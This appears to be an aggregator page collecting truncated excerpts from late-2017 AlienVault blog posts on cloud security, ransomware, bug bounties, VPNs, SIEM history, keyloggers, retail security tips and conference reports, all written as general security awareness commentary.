Are clouds secure? Are they not? Are we going to move workloads to the cloud? Are we not? Over the last few years, these questions have been repeated over and over within many organizations. However, as more companies have made the move to the cloud, vetted providers, and developed their cloud strategy, confusion has lessened – but security woes have not. In the year ahead, we'll continue to see a distinct lack of in-house cloud expertise resulting in security troubles for many organizations. While cloud providers offer adequately secure platforms, users still have a responsibility to ensure they are doing their part toward securing their data in the cloud (think of the shared security model). This includes monitoring for security threats within the cloud environment, and equally ensuring cloud environments are properly configured. But many IT and security professionals aren't aware of their role in cloud security, or are aware but don't know the best way to execute on their responsibilities.
There have been countless cases in 2017 where enterprises have left private information publicly exposed, which has resulted in huge breaches. While most resulted from a failure to properly secure Amazon Web Services (AWS) buckets, this is not the only cloud vulnerability. For example, many people also found that their information was shared publicly via Microsoft's docs.com service. Education and awareness around cloud security and the shared security model can go a long way in minimizing risk and keeping company data safe – regardless of whether it's on-premises or in the cloud.

Ransomware will remain one of the most popular attack methods

Ransomware has dominated many news cycles throughout 2017. And, unfortunately, we won't see this attack vector slow down anytime soon. With lower execution costs, high returns and minimal risk of discovery (compared to other forms of malware), ransomware has quickly become a preferred method of attack for cybercriminals. And it's now easier than ever for virtually anyone – even individuals with minimal security knowledge – to extort money from companies and individuals through do-it-yourself ransomware toolkits or via the services of a Ransomware-as-a-Service (RaaS) provider. Cybercriminals always aim to take the path of least resistance while achieving maximum ROI, and RaaS lets them do just that. While security controls continue to improve and definitely help companies defend against ransomware, the threat vector is becoming increasingly sophisticated and is exacerbated by the growth of the Internet of Things (IoT). The proliferation of IoT devices has vastly expanded the network of potential targets for cybercriminals – making the "ransomware of IoT" the security world's new nightmare.
The debate around insecure IoT devices will heat up

Published: 2017-12-07T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/506871354/0/alienvault-blogs~Six-Cybersecurity-Predictions-for-The-Year-Ahead | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=446446

AlienVault Now Using HackerOne for Responsible Vulnerability Reporting

One of the issues I've seen in companies is the idea that we can do it all, on our own, when it comes to security. One underlying issue is nasty vulnerabilities on company websites. We can test all day every day for vulnerabilities, but it's similar to when an author writes and attempts to edit his/her own book: they miss that significant typo without realizing it. So how can we find outside editors with sharp eyes?

Initially, for the AlienVault website, we had a simple web page explaining how to report vulnerabilities found on our website via email. This was great, but it created a new set of issues: we had to manually manage these reports in a spreadsheet. We tried to script automated responses and wrote a query to sift out duplicated reports, but it took a lot of time and effort. We needed to find a better way to manage our vulnerability reporting program, which we determined was HackerOne.

With HackerOne and their triage services we now have a sturdy database with ticketing capabilities. Here at AlienVault we've also taken advantage of their third-party ticketing system integration, so once the triage team deems a ticket both a valid vulnerability and not a duplicate, we create a ticket directly in our ticketing system with all pertinent information. Bi-directional communications go through our ticketing system, ensuring nothing is lost or accidentally forgotten. This requires only one project manager to interact with HackerOne and the contributing hackers to verify that issues are resolved.
When issues are resolved, we (the contributing hacker and the AlienVault Project Manager) can decide on the proper disclosure of the vulnerability to the public. The purpose of public disclosure via HackerOne is to show a few things:

That we are transparent and part of the community in the effort to help secure our internet.
To allow for recognition of external security researchers and hackers, as they deserve applause for their contributions.
And finally, to share how to fix/remediate the vulnerability with fellow security professionals.

The whole program and process has increased our efforts to secure our domains. What used to be a 5-day response and an unknown remediation time is now merely a 1-2 day response with a reasonable remediation timeline. This new process with HackerOne has enabled us not just to streamline our vulnerability reporting and improve our response time, but also to thank our researchers by rewarding them with reputation points. Click here for more details on the AlienVault HackerOne program. Here's a sample of our Thank You page, where we recognize the contributions of volunteer hackers!

Published: 2017-12-05T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/505538142/0/alienvault-blogs~AlienVault-Now-Using-HackerOne-for-Responsible-Vulnerability-Reporting | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=445084

Explain How VPN Works

The recently discovered KRACK vulnerabilities affecting WPA2 have encouraged people to talk about the benefits of Virtual Private Networks. I think that's great! Ideally, we should all be using VPNs at home, in the office, during our commute, over Wi-Fi, and over Ethernet. But in order to use VPNs, it helps to understand how they work and how they make your internet use more secure.
A VPN is a series of virtual connections routed over the internet which encrypts your data as it travels back and forth between your client machine and the internet resources you're using, such as web servers. Many internet protocols have built-in encryption, such as HTTPS, SSH, NNTPS, and LDAPS. So, assuming that everything involved is working properly, if you use those protocols over a VPN connection, your data is encrypted at least twice!

Many enterprises will insist that their employees use their VPN if they're working remotely by connecting to their office network from home. Sometimes people will use a VPN when they're using BitTorrent to pirate media so that they don't get caught and their ISP can't stop them. I don't condone piracy. But to those people, I strongly suggest avoiding VPNs which are advertised through ads on The Pirate Bay, as they are likely not what they seem and may even be malicious. Sometimes people use VPNs because they're understandably conscious of their everyday security. That's an excellent reason to use them.

PCs, smartphones, tablets, dedicated servers, and even some IoT devices can be endpoints for a VPN connection. Most of the time, your client will need to use a VPN connection application. Some routers also have built-in VPN clients. Unlike proxy networks such as Tor, VPNs shouldn't noticeably slow down your internet traffic under usual circumstances. But some VPNs are faster than others, and one of the most important factors is how many VPN clients are using a VPN server at any given time.

A VPN connection usually works like this. Data is transmitted from your client machine to a point in your VPN network. The VPN point encrypts your data and sends it through the internet. Another point in your VPN network decrypts your data and sends it to the appropriate internet resource, such as a web server, an email server, or your company's intranet.
Then the internet resource sends data back to a point in your VPN network, where it gets encrypted. That encrypted data is sent through the internet to another point in your VPN network, which decrypts the data and sends it back to your client machine. Easy peasy!

Different VPNs can use different encryption standards and technologies. Here's a quick list of some of the technologies that a VPN may use:

Point-to-Point Tunneling Protocol: PPTP has been around since the mid-1990s, and it's still frequently used. PPTP in and of itself doesn't do encryption. It tunnels data packets and then uses the GRE protocol for encapsulation. If you're considering a VPN service which uses PPTP, you should keep in mind that security experts such as Bruce Schneier have

Published: 2017-12-04T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/504810234/0/alienvault-blogs~Explain-How-VPN-Works | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=443987

Things I Hearted this Week – 1st December 2017

thankful for all the good in their life. The best things in life: SIEM and log management, crowd-based threat intelligence, vulnerability assessment, asset discovery, and intrusion detection.

I am Root

Apple found itself in the headlines as it was revealed that anyone could log in with root credentials without a password. I'm sure employees (Geniuses) at Apple stores were delighted with customers trying out the hack on display units. While many experts bemoaned the irresponsible disclosure of the vulnerability, it was apparently known on the Apple developer forums and thought of more as a bug. Perhaps one of the most impressive aspects of this debacle was how quickly Apple turned it around and issued a patch within a day. I don't know what they put in their coffee at Apple HQ, but I'll have two!

Anyone can hack MacOS High Sierra just by typing "root"
| Wired
New security update fixes macOS root bug | Ars Technica
Apple releases update to fix critical macOS High Sierra security issue | The Verge

Portable Faraday Cage

This story caught my attention because of its simplicity. A man in Australia was sacked from his job after it was discovered that the 60-year-old electrician blocked his whereabouts by storing his personal digital assistant, which has a GPS inside, in an empty foil packet of Twisties, a puffy cheese-based snack that is popular in Australia. I can only imagine how the prosecution kept a straight face claiming the man was using an elaborate Faraday cage while holding up an empty packet of crisps (chips).

Employee used crisp packet as 'Faraday cage' to hide his whereabouts during work | Telegraph

Net Neutrality

Net neutrality is a hot topic at the moment; there are some strong proponents and a lot of dialogue ongoing. To coin a phrase, everything is fair in love, war, and online comments. Jeff Kao used natural language processing techniques to analyse net neutrality comments submitted to the FCC from April to October 2017 – and at the risk of sounding like a Buzzfeed article – the results were pretty disturbing.

More than a Million Pro-Repeal Net Neutrality Comments were Likely Faked | Hackernoon

Holiday Cybersecurity guide

The lovable reprobate Rob Graham posted a great guide for anyone visiting relatives during the holidays, and what you can do to help them become more secure. It's a very decent list that's worth checking out.

Your holiday cybersecurity guide | Errata Security

Uber breach

Ride share company Uber

Published: 2017-12-01T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/502870788/0/alienvault-blogs~Things-I-Hearted-this-Week-%e2%80%93-st-December | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=443447 | Tags: Uber

In Honor of Computer Security Day, Let's Celebrate the Evolution of SIEM!

It's the most wonderful time of the year.
The trees on my street have almost completely shed their leaves. My neighbors are stringing multicolored lights on their houses. My local shopping mall has started to play various versions of "Jingle Bell Rock," recorded by many of the stars of top 40 radio from the past few decades. My friends are coming to me with malware-infected smartphones, eager for my wizardry. That's right; Computer Security Day is upon us!

I plan on making a trip to my nearby gift shop, feeling certain I'll find an old-fashioned greeting card in which to enclose a voucher for antivirus software to acknowledge this special day. But we also ought to appreciate how cybersecurity has advanced in recent years. Security Information and Event Management is something that didn't exist until the 21st century; it has evolved over the past few decades, and it illustrates how far we have come.

Before there was SIEM, there was SEM

Anyone who has ever had an administrative role in a network knows that IDS and IPS generate a lot of logs and event information. Security-related logs are usually full of false positive alerts, and security practitioners need to find the alerts that they should actually pay attention to in order to prevent and respond to security problems. By the late 1990s, IDS and IPS output started to become overwhelming for human beings. Security Event Management arose to tackle the problem. Necessity is the mother of invention, eh?

SEM handles events to provide real-time monitoring, console views, event correlation, and notifications. When properly configured and used, SEM provides administrators with a central interface for all of the security events that computers and network appliances in a network record. If event data from another device is accidentally lost after being sent to a SEM system, the SEM will still retain it. Events can be sorted by significance according to configurable criteria.
Another important benefit is that, with the help of a SEM's reporting tools and other features, SEM can help organizations comply with regulatory frameworks which may be applicable to their industry, such as HIPAA, GLBA, PCI-DSS, and Sarbanes-Oxley.

There's no "I" in SEM. If there were, it'd be SIEM

When SEM was invented in 1999, the technology had weaknesses, so Security Information Management (SIM) systems appeared on the market around the same time. One of the main weaknesses of only processing security data through log management and SEM is analysis. SIM was invented to fill that void. SIM focuses on logs while SEM focuses on events. SIM can send logs to a console which generates charts, graphs, and reports that can help human beings make sense of network security trends. I don't know about you, but I totally geek out when I see graphs, so I really appreciate what a lot of SIM software can do. SIM can also store security-related information over a long period of time, which can also aid in regulatory compliance and forensics when used the right way.

Some combinations are terrible. I believe putting shampoo and conditioner in the same bottle is as misguided as putting ketchup and mustard in the same bottle. But other combinations are fantastic, such as putting mint in chocolate and putting anime scenes in Japanese RPGs. Combining SEM and SIM falls into the latter group, and it makes perfect sense. When SEM and SIM combine their extraordinary powers, you get Security Information and Event Management. Mike Rothman estimates that the first SIEM products emerged around 2001, which is a mere couple of years after SEM's emergence.
Mark Nicolett and

Published: 2017-11-30T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/502230328/0/alienvault-blogs~In-Honor-of-Computer-Security-Day-Let%e2%80%99s-Celebrate-the-Evolution-of-SIEM | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=442594

6 Animals Associated with Red Team

Red Teamers Can Learn Secrets by Purple Teaming
Red teams; a diary from the garden of Red versus Blue
Be a Red Teamer to be a Better Blue Teamer: Pen Testing ala Jayson Street

Red teamers are a proud lot. They particularly pride themselves on being able to "get into" any objective, be it a building or a confidential file. Penetration Testing is a key tool for most Red Teamers in InfoSec. Pen Testing involves using various tools and methods to show a company how a bad guy would access their information. Here are some educational blogs on Pen Testing:

How Penetration Testers Use Google Hacking
Penetration Testing vs. Vulnerability Scanning - What's the Difference?
Do I Need a Penetration Test?

But I decided to have a bit of fun with it too. I ran a Twitter poll and came up with this infographic based on my findings from the poll:

I'd like to do a similar poll and infographic for Blue Team, but the only animal I can think to propose in a poll is the faithful, beloved dog. They are protective, loyal and love their humans.

Published: 2017-11-28T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/500912832/0/alienvault-blogs~Animals-Associated-with-Red-Team | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=441255

2017 NopSec State of Vulnerability Risk Management Report

State of Vulnerability Risk Management Report is due.
This year we are particularly excited because of our exploration of a potential threat intelligence source and our partnership with the AlienVault Labs Security Research Team for the research related to malware correlation. The analysis of this year's vulnerability trends could not come at a better (or worse) time, since several relevant data breaches have hit the news wires lately. The "400-pound gorilla" in the house is Equifax, with its multi-million customer record data breach and its patchable vulnerability in Apache Struts exploited by attackers to gain access to the compromised data. We will see from our 2017 State of Vulnerability Risk Management Report that these patch management delays are quite common, but avoidable nevertheless.

In the 2017 State of Vulnerability Risk Management Report we analyzed over a million of our customers' anonymized unique security vulnerabilities. (By unique we mean security vulnerabilities that affect a specific customer, on a unique host, on a unique TCP/UDP port.) For the most part we use CVE and CWE categorization to correlate vulnerabilities, together with the presence of the 30+ unique threat intelligence feeds that NopSec Unified VRM utilizes, which include exploit-db and Metasploit exploits, active malware and targeted attack data, vendor patch data, social media conversations involving the related vulnerabilities, and host value and impact information.

The 2017 report focused on what the industry verticals have in common in terms of vulnerability categorization, which vendors and industries are affected the most by which vulnerabilities, which components most affect the vulnerability risk determination, whether we could draw the same conclusion reached in terms of the vulnerability risk and social media correlation as far as the Dark Web is concerned, and how to use these data to efficiently manage your vulnerability risk management program.
Before going on to the discussion of our report's results, a few disclaimers are due. First of all, this is not a random or representative sample. The data comes from our clients' vulnerability population, which is necessarily skewed toward the industries most represented, including financial services and health care. Also, the sample is not all-encompassing and cannot be considered representative of the population of vulnerabilities. This is also not an Intrusion Detection System, meaning the system cannot be used to predict security intrusions. With that said, this research can still offer important insights to people who would like to improve their vulnerability risk management program.

Industry Verticals

Figure 1

The first analysis we conducted on our customers' vulnerability data was to understand overall which industry vertical has the most vulnerabilities (Figure 1): this was Healthcare, followed in second place by the Financial industry. A possible explanation for this is that the lower level of security maturity for Healthcare, and the huge number of assets under management for the Financial industry, played a factor in explaining these numbers.

Vendor Susceptibility

Figure 2

Industries and Vendors

Published: 2017-11-27T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/500273276/0/alienvault-blogs~NopSec-State-of-Vulnerability-Risk-Management-Report | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=440548 | Tags: Equifax

5 Retail Security Tips: Don't Let Hackers Ruin the Holiday Season

While many people will be kicking off their holiday shopping this weekend to take advantage of brick-and-mortar or online deals, unsavory hackers will be working on gaining access to consumers' personal information through retailers for malicious purposes. Retailers are often targeted during these peak trading periods, when it may be easier for criminals to hide their actions in the traffic.
Hackers may use distributed denial of service (DDoS) attacks to flood retailer networks to render them unavailable to customers. They could also look for vulnerabilities in a retailer's web site and IT operations to exploit by redirecting traffic for online payments to a fraudulent site, or find a gap in cloud security. With the rise of ransomware, retailers are at greater risk than ever this holiday season. Last week's news about a breach at Forever 21 is a reminder of what can happen if retailers haven't taken all the steps needed to tighten their security posture. Below are five tips retailers could take to build up resilience against cyberattacks:

1. Staff awareness: As retailers often hire temporary workers during the holidays, staff training is vital. Staff should be educated on the need to remain vigilant in validating customer identification and looking for any physical signs of intrusion, such as point-of-sale terminals showing signs of tampering. Staff should know what to do or who to call if they see anything suspicious.

2. Monitoring and detection: Retailers typically have widely distributed networks with many remote locations, plus an online presence, with many points of attack. Monitoring the network and endpoints is essential to detecting threats. Complementing this with threat intelligence data can help identify emerging and popular threats against retailers. Most retailers would benefit from a centralized threat detection and response platform that can provide security visibility across cloud and on-premises environments, such as AlienVault USM Anywhere™. https://www.alienvault.com/products/usm-anywhere

3. Share threat data: As many criminals share attack methods and hit multiple retailers at the same time, it is useful for retailers to share threat data amongst themselves. This can include malicious techniques and IOCs (indicators of compromise), so they can take pre-emptive steps to thwart attacks.
The Retail Cyber Intelligence Sharing Center https://r-cisc.org is a good resource for retailers. Additionally, AlienVault Open Threat Exchange (OTX) https://www.alienvault.com/open-threat-exchange is a free, crowd-sourced threat intelligence platform.

4. Implement a response plan: Taking into account varied threat scenarios, retailers should implement response plans. These would include technical controls, such as isolating systems or rebuilding servers, or they could be more procedural and communications-based; these also take into account how partners and customers should be notified of an incident.

5. Have a backup plan: Backup procedures should be implemented in the event any systems become unavailable. For example, if the POS terminals are rendered inoperable, there should be alternative offline means available to take payments.

For consumers, the biggest danger from retail cyberattacks is loss of personal information, such as their Social Security number, da

Published: 2017-11-24T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/498551330/0/alienvault-blogs~Retail-Security-Tips-Don%e2%80%99t-Let-Hackers-Ruin-the-Holiday-Season | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=439797

Jeremiah Grossman: On InfoSec Basics, Incentives, and Warranties

For anyone that's worked in information security for any period, Jeremiah Grossman is a familiar name. Having worked in security for two decades, he's seen many industry cycles come and go. Not content with simply being a professional hacker, highly acclaimed public speaker, published author, founder of WhiteHat Security, and current Chief of Security Strategy for endpoint security vendor SentinelOne, Jeremiah also holds a black belt in Brazilian Jiu-Jitsu.
As InformationWeek put it, "Jeremiah is the embodiment of converged IT and physical security." Over his career, Jeremiah has been an admired advocate of the IT security industry, but also critical of many aspects, such as the lack of vendor accountability to customers. So I was pleased to be able to get some time with him to pick his brain and get some insight into what he thought some of the most pressing issues are, and how we could best approach them.

We see the number of breaches on the rise and we hear a lot about nation-state actors and advanced threats. How many breaches in your opinion are due to the lack of InfoSec know-how or available technology?

Very few breaches are the result of a lack of InfoSec know-how or available technology. Whether it was the breaches of Equifax, Home Depot, Target, Maersk, Sony, DNC, or thousands of others – each, with the exception of perhaps Stuxnet, was entirely preventable. These breaches were the products of missing patches, simple misconfigurations, no multi-factor authentication, weak endpoint protection, and well-understood software flaws. The InfoSec community has seen every attack to exploit these a thousand times — nothing really impresses us anymore. It all boils down to a general lack of InfoSec basics.

Although it may seem to those outside the community that there is a lack of available security technology, that notion couldn't be farther from the truth. In fact, it's quite the opposite. We're drowning in 'hot new' security products, with yet another announced each day. What may be the biggest challenge in InfoSec is that we are seeing too much technology being thrown at today's threats -- with the desperate hope that something will eventually stick. While the bad guys are scaling up their attacks and becoming more deliberate, the InfoSec community is failing to match the same speed and scale we are seeing from attacks.

What role does product innovation or awareness and education have to play in breaches?
Product innovation, awareness and education are huge when it comes to preventing breaches. In order to stop breaches from happening we have to know what we are up against, the motives behind such acts, and how adversaries are actually breaking into systems. To better understand what innovation, awareness and education is needed most, we must have the data that comes from these breaches. This is something we've thankfully been getting better at over the years. And with aggregate investigations into this data, we're better able to put the right strategies into place in order to counteract them. For example, if a company is seeing an attack targeting them in an area where they are lacking proper defense measures, then they will need product innovation to cover that up. With the proper technology innovation and products in general, we'll be able to react better and faster to incoming attacks. As attackers continue to scale, speed of the defense is everything.

You've spoken a lot in the past about incentives to do the right thing, saying how those in the best position have limited incentives to make the right decision at the right time. What kind of incentives do you think need to be put in place?

Simply put: financial incentives. While other colleagues may prefer governmental regulations, I'm pe

Published: 2017-11-22T14:00:00+00:00 | Source: AlienVault Blog, http://feeds.feedblitz.com/~/497281472/0/alienvault-blogs~Jeremiah-Grossman-On-InfoSec-Basics-Incentives-and-Warranties | Aggregator page: www.secnews.physaphae.fr/article.php?IdArticle=438345 | Tags: Equifax

Keystroke Logging - How it Affects the Online Privacy of Internet Users

What do the stats say?

It is shocking to see that in July 2017, a data breach at Equifax led to the exposure of 145,500,000 consumer records, making it one of the largest data breaches in history. Further, the targets of hacking attacks are not just personal users, but many more.
Take a look:

Businesses
Medical and Healthcare entities
Government or military targets
Educational institutions

From the above it is clearly evident that there is a strong need to understand and practice security measures to avoid online privacy intrusions.

How keystroke logging works

Keystroke logging can be achieved by both software and hardware. Let us see how these two methods work:

Hardware keylogger

A hardware keylogger is a device that resembles some part of the computer cabling and is connected between the computer and keyboard. This resemblance makes it easy for the attacker to hide the device. Some examples include inline devices that are attached to the keyboard cable, keyboards with inbuilt keyloggers, etc. However, one drawback of using a hardware keylogger is that the attacker typically needs to return and uninstall the device in order to access the information that has been captured.

Software keylogger

A software keylogger is a computer program that needs to be downloaded and installed on the target computer. However, this software can also be part of some malicious software downloaded unknowingly by the computer user, or executed as part of a rootkit that launches itself and works stealthily. The captured information is uploaded to a server periodically for the controller's access.

What types of information do keyloggers capture?

The capabilities of keyloggers vary according to their type and target. However, the following are some common actions:

Capture passwords that are entered by users
Take screenshots of the device periodically
Capture URLs visited via web browsers and screenshots of the web pages that are viewed
Capture a list of all the applications that are running on the device
Capture copies of sent emails
Capture logs of all instant messaging (IM) sessions

The data captured by a keylogger is automatically sent in the form of reports to a remote computer or web server, as defined by the attacker.
The report is sent by email, FTP or HTTP.

How to avoid keylogger intrusions

Use an antivirus with anti-keylogger capabilities: Go for antivirus software with anti-keylogger capabilities, as it is a type of software specifically designed for the detection of keystroke logging software. Such software has the ability to delete, or at least immobilize, hidden keystroke logging software on a computer.

Say no to free software: Since keyloggers can easily attach themselves to freeware available over th...

AlienVault Blog, 2017-11-21T14:00:00+00:00. http://feeds.feedblitz.com/~/496682404/0/alienvault-blogs~Keystroke-Logging-How-it-Affects-the-Online-Privacy-of-Internet-Users | www.secnews.physaphae.fr/article.php?IdArticle=437648

Adjusting Your Baseline

Perhaps your original baseline appeared somewhere between the 300 and 400 range of whatever you are measuring. A year later, when you return to check your baseline, the numbers have jumped considerably. Medic! These numbers look alarming, but if you are tracking the numbers continuously rather than periodically, you would see more of a trend than a spike. Over time, as your graph grows, you can see more of a periodic slope that probably better represents the monitored activity. Here is a more complete view of the two events shown above. As you can see, this is a much less nerve-jarring picture than the two periodic snapshots. Of course, your ability to continuously track these things depends on what you are tracking, as well as other factors such as competing priorities and workload. This is where you must choose the items based on volatility. For example, should bandwidth use tracking be an every-day event? If you are a SysAdmin, probably not, as a SysAdmin derives knowledge by viewing what is occurring over an extended period of time, so a weekly summary may be perfectly adequate to get a sense of how usage is changing.
However, if you are an InfoSec professional, you may be more concerned with daily spikes in activity, which, amongst other things, could indicate data exfiltration. A capacity planner may be interested in an annual count of new and expired identities on the system; however, the InfoSec team is going to be very suspicious if a high number of accounts are added or removed over the course of a few days. One problem that many auditors have is that these trends are not hard and fast numbers. I recall the words of an investment professional when someone asked about the financial market: “It’s a barometer, not a thermometer.” By tracking various activities at appropriate intervals, you can see what is changing in your environment at a sane level. Know your baseline, but adjust it as required. Alarms may go off, and that is why you are doing what you do. Overall, if there are no emergencies, you can see if the patient is healthy and growing, or, in my personal case, simply aging. Age gracefully!

AlienVault Blog, 2017-11-20T14:00:00+00:00. http://feeds.feedblitz.com/~/496077092/0/alienvault-blogs~Adjusting-Your-Baseline | www.secnews.physaphae.fr/article.php?IdArticle=436743

Things I Hearted this Week 17th Nov 2017

...here. But the TL;DR version is that Lisbon is a lovely city, and BSides was a great event. But enough about me, let’s jump right into it.

Blockchains

Blockchains are a bit of a running joke in that few people properly understand what they are, but are content to throw the term around as a solution to everything and anything. You know something is over-saturating the market when a simple search for blockchain brings up more memes than actual articles. Do check out this article by Jack Preston, which gives a great breakdown of hashes and the structure of a basic blockchain.
Everything you wanted to know about blockchains but were too afraid to ask | Unwttng.com

The Motherboard guide to not getting hacked

The good folk over at Motherboard have put together a handy guide to not getting hacked. It covers the basics, mobile security, privacy, messaging, and even avoiding state and police surveillance. It’s worth a read, and even better, it’s worth sharing with people who may not be overly familiar with security.

The Motherboard guide to not getting hacked | Motherboard

Smart Drugs

It was only a matter of time, but digital pills are here that talk to your doctor. The idea is that the pill will signal a smartphone once it reaches the gut so doctors can track whether patients are taking their medicine. The main use case discussed so far has been to ensure mental health patients are taking their medication on time. There could probably be other uses; maybe an app could helpfully remind people to take their medication, and automatically log what was taken and when, reducing the need for those annoying multi-compartment boxes that some people have which carry all their medicine for the week. However, there are definitely darker uses for this technology. Given how poorly secured medical devices have been, it’s probably not too difficult to spoof the messages to make it appear as if a patient has taken an overdose, or even to block the fact that someone has taken their medication, resulting in the doctor forcing an overdose... I should stop spending time with so many bad hackers.

Digital pills that talk to your doctor are here | The Wall Street Journal

Major Malfunction

Most people in the industry have heard of Adam Laurie, aka Major Malfunction. He’s been involved in DefCon and the London chapter for, well, as long as I can remember. A lot of Adam’s research is focussed around RFID / NFC security. It was great to see him featured in a Vice video on hacking passports and credit cards.
It’s well worth the watch, if for nothing else than to be jealous of his impressive house!

Hacking passports and credit cards with Major Malfunction | Vice.com

How Facebook figures out everyone you’ve ever met

How do these things happen? A social work...

AlienVault Blog, 2017-11-17T14:00:00+00:00. http://feeds.feedblitz.com/~/494314424/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Nov | www.secnews.physaphae.fr/article.php?IdArticle=435908

BSides Lisbon and the Global Community

The Lisbon Experience

It was the first time I’d visited Lisbon, or indeed even Portugal, so the conference gave me a chance to take in some of the sights. Even though it was November, the weather was uncharacteristically warm, which allowed me to explore the old part of town with its narrow cobbled streets full of character. The city has an undoubtedly Mediterranean vibe to it. The shops open at a leisurely time, most supermarkets were opening up at 9am and no-one appeared to be in a rush in the early hours. Later in the evening things are very different, though, and most places are open till midnight. Overall the people were generally very friendly and English is widely spoken, so I had no trouble getting around and interacting with the locals.

The Conference

BSides Lisbon itself was very well organised. It was its fourth year, which is about the time most conferences start to really hit their stride. There were around 300 attendees, which gave it that tight-knit feeling. I really like conferences that are around the 500 attendee range, giving a lot of variety of attendee whilst not completely overwhelming you. Sometimes the small things make all the difference. The badges were awesome, upcycling some old floppy disks. Even the t-shirts had an easter egg which shows up under light in the dark. Clearly the organisers went through a lot of time and effort in making the experience enjoyable for all.
The attendees all seemed to have a good time, and were well fed and looked after over the two days, with ample networking opportunities. A double bonus for me was that I was invited to deliver a keynote and AlienVault was one of the awesome sponsors of the event. Overall, two thumbs up and a big cheesy grin from me! Here's the video of my talk:

AlienVault Blog, 2017-11-16T14:00:00+00:00. http://feeds.feedblitz.com/~/493629882/0/alienvault-blogs~BSides-Lisbon-and-the-Global-Community | www.secnews.physaphae.fr/article.php?IdArticle=434892

Powering the Cisco Threat Intelligence Director with AlienVault OTX Threat Data

We built the AlienVault® Open Threat Exchange® (OTX™) to disrupt the traditional information siloes in the threat intelligence community, making threat intelligence open and free for anyone to share and consume, including security researchers, IT security professionals, ISACs, and academic and other institutions. Today, OTX has 65,000+ global participants in 140 countries who contribute over 14 million threat artifacts daily. Now, Cisco users can leverage the full breadth of OTX through a new AlienVault partnership.

Today, we are excited to announce a new partnership with Cisco to integrate OTX threat data in the Cisco Threat Intelligence Director (CTID). Through this new technology partnership, CTID receives and operationalizes OTX threat data, providing monitoring and actionable insights to users so they can investigate and quickly respond to the threats impacting their critical infrastructure. With the combined power of AlienVault OTX and the Cisco Threat Intelligence Director, IT security teams can respond to incidents more quickly and with confidence that they’re getting the most up-to-date and comprehensive threat intelligence available.
Read the full Cisco blog here: https://blogs.cisco.com/security/expanding-cisco-security-ecosystem

This integration underscores the ongoing partnership between AlienVault and Cisco, two leading cybersecurity technology providers. Earlier this year, we announced our Cisco Umbrella integration with the launch of the AlienApp for Cisco Umbrella. The AlienApp for Cisco Umbrella, included in USM Anywhere, enables security analysts to respond to threats detected in USM Anywhere by sending the malicious domain information to Cisco Umbrella to block any further communications with that domain. These response actions can be automated, helping to reduce the time between detection and response.

Join the AlienVault OTX

We continue to evolve and expand the reach of the Open Threat Exchange (OTX), the world’s first truly open threat intelligence sharing community. The threat data shared by OTX members includes real-time information on new attacks, malware, and ransomware outbreaks as they emerge in the wild. These artifacts provide deep security insights into pressing threats and help organizations gain greater security visibility into their critical IT environments, so they can respond to attacks quickly and confidently. OTX is free to join and to use. Sign up today at otx.alienvault.com

AlienVault Blog, 2017-11-15T17:30:00+00:00. http://feeds.feedblitz.com/~/493021314/0/alienvault-blogs~Powering-the-Cisco-Threat-Intelligence-Director-with-AlienVault-OTX-Threat-Data | www.secnews.physaphae.fr/article.php?IdArticle=434025

Steve Ragan: Writing for Impact

Steve Ragan has been covering the security industry for longer than some people have been working in it. More than a journalist, Steve is an active participant in the community and is often found at security conferences helping out and exchanging stories, all with a cheeky grin that radiates a youthful playfulness.
Steve, you've been covering information security / cybersecurity for many years now. What have been some of the biggest changes you've seen in the industry during this time?

There have been a few changes. The first one that stands out to me is the influx of new blood to the industry. People have come in with new ideas and viewpoints, and honestly, I think it's had an impact. I see them at conferences and they're excited, energized and happy to be part of something bigger than themselves. I've also seen us older folk grow up some, which is a good thing.

A few years ago, the concept of a bug bounty was foreign, but now it's commonplace. The debate between Full Disclosure and "responsible" or "coordinated" disclosure, that's another change. I'm a Full Disclosure person – a lot of us were back then – but even I've changed somewhat, as I see the upside for coordinated disclosure on some things, even if I still think the practice overall was originally developed to punish researchers.

Professionally, one of the changes I've seen develop over the years is how we cover security in the media. It's gone from the back pages to headline news, and there is certainly more attention given to software flaws, failed security standards and practices, and the role security plays within an organization.

As a journalist, you must get pitched like crazy. What things really grab your interest amongst all the noise?

Impact. If the pitch can demonstrate impact, it gets my attention. A good deal of my story development process follows a basic pattern:
- Pain - what is the pain, why does it exist, where did it come from?
- Impact - what impact does this pain have on a person or organization?
- Resolution - what can you do to fix the pain?
Pitches that come close to aligning to that will always get a read.

What aspects of your job do you really enjoy?
Research - I love researching a story and finding the hidden gem of information that will help someone working in a cube or in the back office fix a given problem. Education - I like explaining things to the wider public, those outside of the echo chamber. The bonus for me is that while I'm doing both of those things, I get a chance to learn myself, and interact with experts who are happy to teach.

When investigating a story, are there any trusted sources you go to, or do you prefer to do research yourself?

I have trusted sources in various markets and areas of security. So, depending on the story, one of them will get a call. If the story requires research, I'll do that myself, but it isn't uncommon for a source to help me out by pointing me in the right direction.

Every day brings about new breaches. How important do you find it to be first to break a story?

Breaking a story, assuming you mean being the first to cover something, isn't important to me at all. It's nice to be first, but I'd rather be right and have actual information for readers to understand scope and impact, even if that means I’m the 9th journalist to publish. Other journalists might feel differently, but security is a very small space still, so trying to chase a story just to be first will wear you down rather quickly. Instead, I focus on the value add, and try and get original ideas or concepts into a story that help in th...

AlienVault Blog, 2017-11-15T14:00:00+00:00. http://feeds.feedblitz.com/~/492907046/0/alienvault-blogs~Steve-Ragan-Writing-for-Impact | www.secnews.physaphae.fr/article.php?IdArticle=434026

“Prime”-ing for Amazon and Other IoT Devices

